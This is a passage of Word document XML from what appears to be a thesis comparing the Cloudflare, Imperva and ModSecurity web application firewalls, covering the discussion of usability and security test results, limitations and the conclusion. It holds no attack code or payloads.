        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Some improvements to the performance test that could be done next time would be to have more requests to get a more accurate average. Another would be to expand the objective of the test. Instead of only testing index page, duration taken for each WAF to block the same request should also be tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3D7CA" w14:textId="3B6D9466" w:rsidR="00126E2D" w:rsidRPr="00D3294E" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc71138512"/>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r w:rsidR="00126E2D" w:rsidRPr="00D3294E">
        <w:t>Alerts/Usability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="0D5F9A21" w14:textId="6E6AC062" w:rsidR="00126E2D" w:rsidRDefault="00930ABF" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In the results section, the alerts/usability test results were presented in a table to conduct a comparison as fairly as possible. According to the results, Cloudflare had the best score, followed by Imperva and ModSecurity last.</w:t>
      </w:r>
      <w:r w:rsidR="00FC1889">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, the metrics could not capture qualitative results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10635F19" w14:textId="00DF5535" w:rsidR="00FC1889" w:rsidRDefault="00FC1889" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In terms of user interface (UI) at first glance, I would say that Cloudflare led the pack. The UI was simple, all the information I would require were in one place, visual aids such as graphs and tables were used to make the data more presentable too. Imperva would be a close second. Its alerts were also easily accessible. ModSecurity is the least intuitive as it does not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>have any graphical user interface (GUI) for its alerts. However, there are third party tools available to parse the alerts to give it a GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D47360" w14:textId="0CC52716" w:rsidR="004D0C64" w:rsidRDefault="004D0C64" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In terms of user experience (UX), Imperva would place first. As a consumer, if I have found an alert that was a false positive to me, I would like to be given options for actions to be taken accessible and its implementation easy for me. Imperva did just that. </w:t>
      </w:r>
      <w:r w:rsidR="007E2314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Imperva has a quick whitelist option as stated i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">n the metrics table </w:t>
      </w:r>
      <w:r w:rsidR="007E2314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">in the results section. This quick option is in no way a limited option to add an exclusion as compared to adding an exclusion via a rule. In fact, when the button “Add whitelist” is clicked, a pop-up window would be displayed with the input boxes already filled up with information from the alert. I would just have to check or uncheck which parameters to add in the exclusion. </w:t>
      </w:r>
      <w:r w:rsidR="00A66418">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare would be in second place but no way close in this aspect. ModSecurity is in last place because it does not have any portal and creating exceptions within ModSecurity can be complicated if you do not understand the SecRules language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02792D65" w14:textId="3634C1F0" w:rsidR="008A41CD" w:rsidRDefault="008A41CD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100F586" w14:textId="32C6829A" w:rsidR="008A41CD" w:rsidRDefault="008A41CD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The test for alerts/usability could have been better if a qualitative survey was conducted to have a qualitative aspect of it tested as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBAB67" w14:textId="7B140660" w:rsidR="00126E2D" w:rsidRPr="007379C7" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc71138513"/>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r w:rsidR="00126E2D" w:rsidRPr="007379C7">
        <w:t>Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="5C0ED57D" w14:textId="00B03F03" w:rsidR="00126E2D" w:rsidRDefault="004E7274" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The final test in this thesis was security. The results of this test were presented in a table, showing how many payloads were blocked by each WAF for each attack vector.</w:t>
      </w:r>
      <w:r w:rsidR="007D7609">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC5987">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The results showed that ModSecurity performed the best at blocking the payloads</w:t>
      </w:r>
      <w:r w:rsidR="006D2411">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all the attack vectors</w:t>
      </w:r>
      <w:r w:rsidR="00FC5987">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00977378">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva performed second best and Cloudflare last.</w:t>
      </w:r>
      <w:r w:rsidR="00E514CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Although ModSecurity performed the best, the difference in results differ too much from that of Imperva and Cloudflare. As such, I cannot help but wonder how many of these blocks could have caused false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E1735" w14:textId="3AA242E7" w:rsidR="00EE6A8E" w:rsidRDefault="00EE6A8E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In terms of </w:t>
      </w:r>
      <w:r w:rsidR="00106CA2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">rules, it seemed that ModSecurity’s rules were very aggressive. During the test, I found that ModSecurity’s rules seemed to have been detecting based on special characters. This was also seen in the results where some rules that were triggered were due </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">to meta characters. </w:t>
      </w:r>
      <w:r w:rsidR="00AC353F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This could result in more false positives.</w:t>
      </w:r>
      <w:r w:rsidR="006254EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aside from that, although the CRS is not managed rule sets, they are created by experts from OWASP and made available to auto update whenever there is a release, which is a very good feature for an open-source WAF.</w:t>
      </w:r>
      <w:r w:rsidR="00AD650E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Depending on the consumer’s preference, some might prefer having the security rules fully managed by the organisation like how is done by Imperva, while others may prefer to have control over options to enable or disable security rules like how is done by Cloudflare.</w:t>
      </w:r>
      <w:r w:rsidR="000174C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found that all three WAFs’ default rules did pretty well in identifying the string that was suspicious or potentially malicious accurately. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0D26B" w14:textId="77777777" w:rsidR="008133F4" w:rsidRDefault="0086783E" w:rsidP="00901B9C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In terms of creating of user-</w:t>
      </w:r>
      <w:r w:rsidR="00202998">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>crafted rules, Imperva would be the most preferred. Not only is the UI easy for consumers to navigate, the potential for crafting context for the rules is huge with the use of their syntax. Cloudflare places closely, at second place as they too provide a huge range of context for crafting rules. One huge difference is that they do not use any syntax. ModSecurity potentially could be able to achieve many of what Imperva and Cloudflare can but crafting rules in ModSecurity poses a huge challenge.</w:t>
      </w:r>
      <w:r w:rsidR="00901B9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> However, it is possible to craft and implement rules to block the requests that were not blocked by the default rules.</w:t>
      </w:r>
      <w:r w:rsidR="0019341A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> For Imperva and Cloudflare consumers, they could possibly reach out to the support team if the rule could be created as part of managed rules or even ask for advise on how the rules could be crafted on user’s end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF6C26" w14:textId="21E5C8A1" w:rsidR="0086783E" w:rsidRDefault="008133F4" w:rsidP="00901B9C">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This brings me to support. ModSecurity, being open-source, has the public community to turn to when an issue is faced. However, there is no support team to support every request or enquiry. Imperva and Cloudflare, on the other hand, have support teams available to provide assistance. Every query sent through a support ticket would be expected to be attended to within</w:t>
      </w:r>
      <w:r w:rsidR="008120F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a certain period, depending on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the company’s service level agreement.</w:t>
      </w:r>
      <w:r w:rsidR="00202998">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3306997B" w14:textId="35928E3B" w:rsidR="00FC5987" w:rsidRDefault="00FC5987" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52673D28" w14:textId="4C90B6F7" w:rsidR="00FC5987" w:rsidRDefault="00E514CD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>One additional test that should be included next time would be a test for false positives.</w:t>
      </w:r>
      <w:r w:rsidR="00E2197E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Another test that could be done would be to test against the WAFs again after enabling all the rules available and setting them to block mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEEF790" w14:textId="73759D22" w:rsidR="007379C7" w:rsidRPr="007379C7" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc71138514"/>
      <w:r>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidR="007379C7" w:rsidRPr="007379C7">
        <w:t>Overall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="625C039C" w14:textId="2162AE55" w:rsidR="007379C7" w:rsidRDefault="009C499C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Overall, it was observed that each WAF performed well in different aspects. There is no clear overall winner or best WAF as it would depend on the consumer’s requirements and limitations.</w:t>
      </w:r>
      <w:r w:rsidR="00F9431D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the consumer is an individual with low budget and cannot afford to pay for the subscriptions, ModSecurity could be the best option as it is free. For small businesses, which have only a couple of websites to onboard the WAF, the best choice to consider could be Cloudflare or Imperva. For enterprises, Imperva could be the first choice, given its records reflected as being a leader by Gartner’s magic quadrant or Cloudflare as an alternative. These are my opinions based on the overall findings from this thesis as well as the market standing of the companies and views the management make take when considering investing in a WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6B0B1" w14:textId="216BD19F" w:rsidR="002A65DD" w:rsidRDefault="002A65DD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The research question for this thesis was </w:t>
      </w:r>
      <w:r w:rsidR="00BA0692">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“To what extent is the effectiveness of a Web Application Firewall on protecting web applications from cyber-attacks?”. The answer to it based on the results would be that WAF is effective on protecting web applications from cyber-attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230345E0" w14:textId="745969F3" w:rsidR="00003CB7" w:rsidRPr="00C6048C" w:rsidRDefault="00874B1E" w:rsidP="00874B1E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc71138515"/>
      <w:r>
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r w:rsidR="00003CB7" w:rsidRPr="00C6048C">
        <w:t>Limitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="518A21A2" w14:textId="6EEF2A61" w:rsidR="00126E2D" w:rsidRDefault="00C6048C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Limitations of this thesis mainly fall in the tests that could have been improved on should there have been more time and resources.</w:t>
      </w:r>
      <w:r w:rsidR="002C258C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00213454">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Performance test could have </w:t>
      </w:r>
      <w:r w:rsidR="002C258C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>been carried out more extensively by having more requests to achieve a more reliable average and a test to determine the duration each WAF would take to block a request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839AF1E" w14:textId="1C674174" w:rsidR="00B56C0D" w:rsidRDefault="00B56C0D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The alerts/usability test could have been improved by having a qualitative test such as a survey and evaluate the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5009F9" w14:textId="3AEFA4A7" w:rsidR="00213454" w:rsidRDefault="00213454" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security test did not test for false positive</w:t>
      </w:r>
      <w:r w:rsidR="00780821">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s. An extended test could be carried out to test if more payloads would have been blocked with all available rules enabled in block mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD175D9" w14:textId="0F500167" w:rsidR="000E2933" w:rsidRPr="006C2E2B" w:rsidRDefault="003E44C2" w:rsidP="003E44C2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc71138516"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="000E2933" w:rsidRPr="006C2E2B">
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="1A18E9AB" w14:textId="45834A96" w:rsidR="00D61324" w:rsidRDefault="006C2E2B" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, </w:t>
      </w:r>
      <w:r w:rsidR="00D61324">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">in today’s environment, the internet is not a very safe place. As each day passes, more websites and web applications fall victim to cyber-attacks. Many of these attacks could have been prevented or mitigated with the use of right tools </w:t>
      </w:r>
      <w:r w:rsidR="003403A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>and proper knowledge.</w:t>
      </w:r>
      <w:r w:rsidR="006E38DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> While many may think that security requires a lot of investment and think that it is a good idea to give security a miss, this thesis has shown that statistics show that organisations lose more through a breach that they would have invested in security. This thesis has also explored and shown that there are options for those with low or no budget</w:t>
      </w:r>
      <w:r w:rsidR="005743F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, that security does not necessarily be expensive</w:t>
      </w:r>
      <w:r w:rsidR="006E38DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002A65DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This thesis explored the cloud environment and its models. Its impact on consumers were also explored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE5CBE" w14:textId="068E35AC" w:rsidR="000E2933" w:rsidRDefault="005743F1" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This thesis showed that </w:t>
      </w:r>
      <w:r w:rsidR="00D61324">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>web application firewall (WAF) provides good protection against attack vectors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and does not affect the performance of the web application much</w:t>
      </w:r>
      <w:r w:rsidR="005959EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E40031">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00245965">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">It also showed that the WAFs provided sufficient information through alerts and logs. </w:t>
      </w:r>
      <w:r w:rsidR="00E40031">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">However, this thesis also showed that the WAF should be properly configured with the necessary settings and rules may require fine tuning. It was also shown that WAF does not provide a full protection for the server as it only protects attacks on layer 7 and some attacks on layer 6 of the </w:t>
      </w:r>
      <w:r w:rsidR="006D4C65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Open Systems Interconnection (</w:t>
      </w:r>
      <w:r w:rsidR="00E40031">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OSI</w:t>
      </w:r>
      <w:r w:rsidR="006D4C65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E40031">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> model.</w:t>
      </w:r>
      <w:r w:rsidR="00C80AE4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Other tools would also be required to provide full protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32A2AA" w14:textId="690940E6" w:rsidR="002A65DD" w:rsidRPr="00DE6606" w:rsidRDefault="00A45BE1" w:rsidP="002A65DD">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Like any research and experiment, this thesis has its limitations. While significant findings were achieved, there were shortcomings in the tests conducted to provide a more holistic result. Recommendations for future works were also shared so that more findings may be made to benefit the community.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC0CBB" w14:textId="61745620" w:rsidR="004E17F9" w:rsidRDefault="004E17F9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In summary, it can be concluded that WAF is indeed effective on protecting web applications from cyber-attacks.</w:t>
